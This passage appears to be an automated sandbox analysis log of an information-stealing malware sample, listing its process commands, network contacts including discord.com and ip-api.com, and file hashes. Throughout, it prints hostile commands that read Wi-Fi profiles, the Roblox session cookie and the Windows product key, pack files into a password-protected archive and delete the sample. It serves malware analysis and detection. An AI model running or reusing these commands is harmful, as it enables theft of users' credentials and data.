AJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cq4otqnh\cq4otqnh.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48E0.tmp" "c:\Users\Admin\AppData\Local\Temp\cq4otqnh\CSCD8DB3D36378D42CB9B2497B4B97B757A.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI27522\rar.exe a -r -hp"Mootje123" "C:\Users\Admin\AppData\Local\Temp\ENg2W.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI27522\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI27522\rar.exe a -r -hp"Mootje123" "C:\Users\Admin\AppData\Local\Temp\ENg2W.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\release\map\map.exe""
C:\Windows\system32\PING.EXE
ping localhost -n 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-6yzbe.in | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| IE | 52.111.236.22:443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI27522\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
memory/4188-25-0x00007FFFD1C00000-0x00007FFFD21E9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI27522\blank.aes
| MD5 | c232f23b0c3ae2c8b7459b0ee4361dc3 |
| SHA1 | cd858ca6b96625842cf07a7d14ae0095e032e588 |
| SHA256 | df888b9e488e873c6d0e7ed7af90ee37c6ed4e13284416ca4f750c866046c414 |
| SHA512 | 18b14ff74b7e5e70ecb859446c8044b7eefaaa9f2b664e900368363e0eaf918ccf31bee6c629f5c60dd2ab2a3cc2ae24daebfd5a9f26a51c2560b1002f1e3a39 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_ssl.pyd
| MD5 | f9cc7385b4617df1ddf030f594f37323 |
| SHA1 | ebceec12e43bee669f586919a928a1fd93e23a97 |
| SHA256 | b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6 |
| SHA512 | 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb |
memory/4188-48-0x00007FFFE6C60000-0x00007FFFE6C6F000-memory.dmp
memory/4188-47-0x00007FFFE4CD0000-0x00007FFFE4CF3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_sqlite3.pyd
| MD5 | 1a8fdc36f7138edcc84ee506c5ec9b92 |
| SHA1 | e5e2da357fe50a0927300e05c26a75267429db28 |
| SHA256 | 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882 |
| SHA512 | 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_socket.pyd
| MD5 | 1a34253aa7c77f9534561dc66ac5cf49 |
| SHA1 | fcd5e952f8038a16da6c3092183188d997e32fb9 |
| SHA256 | dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f |
| SHA512 | ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_queue.pyd
| MD5 | 347d6a8c2d48003301032546c140c145 |
| SHA1 | 1a3eb60ad4f3da882a3fd1e4248662f21bd34193 |
| SHA256 | e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192 |
| SHA512 | b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_lzma.pyd
| MD5 | 542eab18252d569c8abef7c58d303547 |
| SHA1 | 05eff580466553f4687ae43acba8db3757c08151 |
| SHA256 | d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9 |
| SHA512 | b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_hashlib.pyd
| MD5 | b227bf5d9fec25e2b36d416ccd943ca3 |
| SHA1 | 4fae06f24a1b61e6594747ec934cbf06e7ec3773 |
| SHA256 | d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7 |
| SHA512 | c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_decimal.pyd
| MD5 | e3fb8bf23d857b1eb860923ccc47baa5 |
| SHA1 | 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0 |
| SHA256 | 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3 |
| SHA512 | 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_bz2.pyd
| MD5 | c413931b63def8c71374d7826fbf3ab4 |
| SHA1 | 8b93087be080734db3399dc415cc5c875de857e2 |
| SHA256 | 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293 |
| SHA512 | 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\unicodedata.pyd
| MD5 | 8c42fcc013a1820f82667188e77be22d |
| SHA1 | fba7e4e0f86619aaf2868cedd72149e56a5a87d4 |
| SHA256 | 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2 |
| SHA512 | 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\sqlite3.dll
| MD5 | dbc64142944210671cca9d449dab62e6 |
| SHA1 | a2a2098b04b1205ba221244be43b88d90688334c |
| SHA256 | 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c |
| SHA512 | 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\select.pyd
| MD5 | 45d5a749e3cd3c2de26a855b582373f6 |
| SHA1 | 90bb8ac4495f239c07ec2090b935628a320b31fc |
| SHA256 | 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876 |
| SHA512 | c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\libssl-3.dll
| MD5 | bf4a722ae2eae985bacc9d2117d90a6f |
| SHA1 | 3e29de32176d695d49c6b227ffd19b54abb521ef |
| SHA256 | 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147 |
| SHA512 | dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\libcrypto-3.dll
| MD5 | 78ebd9cb6709d939e4e0f2a6bbb80da9 |
| SHA1 | ea5d7307e781bc1fa0a2d098472e6ea639d87b73 |
| SHA256 | 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e |
| SHA512 | b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\_ctypes.pyd
| MD5 | 00f75daaa7f8a897f2a330e00fad78ac |
| SHA1 | 44aec43e5f8f1282989b14c4e3bd238c45d6e334 |
| SHA256 | 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f |
| SHA512 | f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4 |
C:\Users\Admin\AppData\Local\Temp\_MEI27522\base_library.zip
| MD5 | 32ede00817b1d74ce945dcd1e8505ad0 |
| SHA1 | 51b5390db339feeed89bffca925896aff49c63fb |
| SHA256 | 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a |
| SHA512 | a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7 |
memory/4188-54-0x00007FFFE1750000-0x00007FFFE177D000-memory.dmp
memory/4188-57-0x00007FFFE1540000-0x00007FFFE1559000-memory.dmp
memory/4188-58-0x00007FFFE1480000-0x00007FFFE14A3000-memory.dmp
memory/4188-60-0x00007FFFD18E0000-0x00007FFFD1A57000-memory.dmp
memory/4188-63-0x00007FFFE1260000-0x00007FFFE1279000-memory.dmp
memory/4188-64-0x00007FFFE16D0000-0x00007FFFE16DD000-memory.dmp
memory/4188-66-0x00007FFFE08B0000-0x00007FFFE08E3000-memory.dmp
memory/4188-68-0x00007FFFD14A0000-0x00007FFFD156D000-memory.dmp
memory/4188-72-0x0000021F761D0000-0x0000021F766F0000-memory.dmp
memory/4188-71-0x00007FFFD0F80000-0x00007FFFD14A0000-memory.dmp
memory/4188-77-0x00007FFFD1C00000-0x00007FFFD21E9000-memory.dmp
memory/4188-80-0x00007FFFE4CD0000-0x00007FFFE4CF3000-memory.dmp
memory/4188-79-0x00007FFFD0970000-0x00007FFFD0A8C000-memory.dmp
memory/4188-78-0x00007FFFE13F0000-0x00007FFFE13FD000-memory.dmp
memory/4188-74-0x00007FFFE11F0000-0x00007FFFE1204000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnctxxqf.3lo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3612-82-0x00000151659C0000-0x00000151659E2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
\??\c:\Users\Admin\AppData\Local\Temp\cq4otqnh\cq4otqnh.cmdline
| MD5 | afc7fe3e1bd02867fc9191f4fb481285 |
| SHA1 | 87b7dafaf43f86f001520ae9d165745914bb5134 |
| SHA256 | ef31bea7da173dfa72707bfe4c699d3f4f1c8a8579d43e887f40a4bf219e987b |
| SHA512 | 9b8e919fa585896249c964404c18cf74092005be49ae500be893e1546ca52169de9d408b1acaa2710d348e56da0616b907aa5328540cc150ac3292d53cdb89a9 |
\??\c:\Users\Admin\AppData\Local\Temp\cq4otqnh\cq4otqnh.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\cq4otqnh\CSCD8DB3D36378D42CB9B2497B4B97B757A.TMP
| MD5 | 9a6581435d495dbd0f808e06d6a78546 |
| SHA1 | 36cbe6deff105cbbac4b4440fee18006547528c6 |
| SHA256 | ebad3cfbf1ef3b41db700f74b4cc3c5b2b85f412b2ae984495769e83c59a6186 |
| SHA512 | 7662c7eb29812466ba166c52564c2b08b31ecc99147b67bbdbf255dd52b13fd2ce50312161d5f16c091063268c6fe9d55a8fd498007ace366eeadde6cfcd1787 |
C:\Users\Admin\AppData\Local\Temp\RES48E0.tmp
| MD5 | 3cf9748352b9aac4711b84a965bb9ee8 |
| SHA1 | 1c652bede8b2b1d5def20f62b187159398263020 |
| SHA256 | d4d9378fd5020c5a45d960dbbd508e0920e8f18bab4d04e033fdeb1cb5857f79 |
| SHA512 | 0f35eef419942891658c6dcf80b54524948860bcdb0ebefe9ed07450912db713dea385ff82bc322fbf07c806cd31b8c458267e35bccaed86d6824eee59d67866 |
C:\Users\Admin\AppData\Local\Temp\cq4otqnh\cq4otqnh.dll
| MD5 | 635fceba6bd880a5973fab2f69510316 |
| SHA1 | cde5321bea0275e6cf0076b950ad6ab1242b0f5b |
| SHA256 | 6519fdea3d45a3b3d1cc2f471daf17fa88c5bde39c6147afa56d80cf9b5be95a |
| SHA512 | 2ef87195b0c4b280deedbfa205b4eefc0ac4cf072f2d888b6f88450c145f2a03a74a7869b468dbc3097dd0b5db9f5149cf62b5c7fe0e8efeedfe8b469aed1d63 |
memory/5020-194-0x00000157653A0000-0x00000157653A8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0256bd284691ed0fc502ef3c8a7e58dc |
| SHA1 | dcdf69dc8ca8bf068f65d20ef1563bbe283e2413 |
| SHA256 | e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf |
| SHA512 | c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5a5388d4a7f6702df7f5bf2d61adf574 |
| SHA1 | 13c2604c704ca26db66a709ed4aed4c97094657b |
| SHA256 | 6bad6ca0d2a1a690d977894502ea715dc66c8f1f078cb86f5b068cf9a6bc8832 |
| SHA512 | f1e4614e36870fb74580ab1c40f5ed33e690d2a3efd1cab37248bfa6b8e6ba96bd578cb5a44b26f8b832c969d5f0b7862b29da559c14fe3e3994019b1417d8b5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 276798eeb29a49dc6e199768bc9c2e71 |
| SHA1 | 5fdc8ccb897ac2df7476fbb07517aca5b7a6205b |
| SHA256 | cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc |
| SHA512 | 0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2 |
memory/4188-260-0x00007FFFE1480000-0x00007FFFE14A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\LockUse.mp3
| MD5 | 6524d005657377596d3ad382dd95e3fd |
| SHA1 | 91e8efe76c63276707b245678cecb5c0de2ae1a4 |
| SHA256 | 99b3f660cd90af2a02fd0d379d5cc814d40766207dcac73e7455a6e964968ee2 |
| SHA512 | 56d6b778d61044076acc3ab1a34823b7bf0358dcc59a09e2715f4a30fbed9d34ef44d4fc0febebe4e42b574c8fa0cb5add776ede69e3d9bbd93a614374fe7e4e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\RestoreHide.xls
| MD5 | 1214c384f17c11b3b0de07eb5537f8b7 |
| SHA1 | 2cb6d2bff1d30f3f41e7ca4506bbf54a3641eebe |
| SHA256 | 1d8e3c0cd506c2b44ee7c2ca8666f4fc72fe016343f5a30cdb261ad8dc008341 |
| SHA512 | 09a6f45c90a15433f12664ae9d24e38cf68c9db0091fe897a22d8718b11b9de8d54e6d21c4b806c1aeebcfc06eb10c1e7b83f489f33851b6a920ed36b2ec7470 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\EnterRemove.xls
| MD5 | c37941173873ba761d42aa95614bc6ad |
| SHA1 | 413e76d07cb61f476ef53bc95227523c3b300cf5 |
| SHA256 | c47c4d848a71b67ce5481b81a413a6867202824f53e469c642925c6730dc46c5 |
| SHA512 | bb2eb6d88fad1f9e06e53d34149c8337e06ffd4875af7aea40c6bc3e46d83b97f4b1aefb8974513e7d21f3f3d21cff8936dea1782be7976ead80fb5f32ee95c1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\OpenConfirm.docx
| MD5 | 394b1270f648522f427be58765c0351a |
| SHA1 | bfa5f29f5c436b5b0ea77741459f79869ec28335 |
| SHA256 | 60c7664db3dfb023c1db62029e9800597f19fd4b410c49d1706c1f9378a033e5 |
| SHA512 | 6145cb9b115713226c3b7675335e4f407f247951cca7f189ecd0895f696cf570404c7a590f063024522581447808c7a9df5c1b594195661b38aa81e157353e71 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\PublishShow.doc
| MD5 | 5c8f9dddc7663fbe8e43b11d9e47f25b |
| SHA1 | 6101a3995eddf19fd61247ff7d2c84939de03e47 |
| SHA256 | 5339095848b3ec073c70ed4a21d2e185b2b44990dbb4faac2f1b9b10af31b270 |
| SHA512 | 31fefd598358bc50293969d11dd0f2d675263641d0b6de4b336e1a2748dff8c212f23bfda7761845d2a641c26b8dbbd940da3d341edeb59e66deb076147253e1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\ResizeClear.pdf
| MD5 | 3b35d1fb059a878a905c78e433573992 |
| SHA1 | e6bf9838ebaf5bfe1306259930da3cb081581885 |
| SHA256 | 3f9a7f46e026040e3057615fe0cd29fabf24fb4ebeb6e4e2dd466ff08bd2a40c |
| SHA512 | cddb0f543d0eb100aa9b0a9c2811f9323e73a310683692085f9eabc93280faea405d81e85cea3e95526bac541b775bb6caafa32f76060613e8de6c2f9dc04503 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
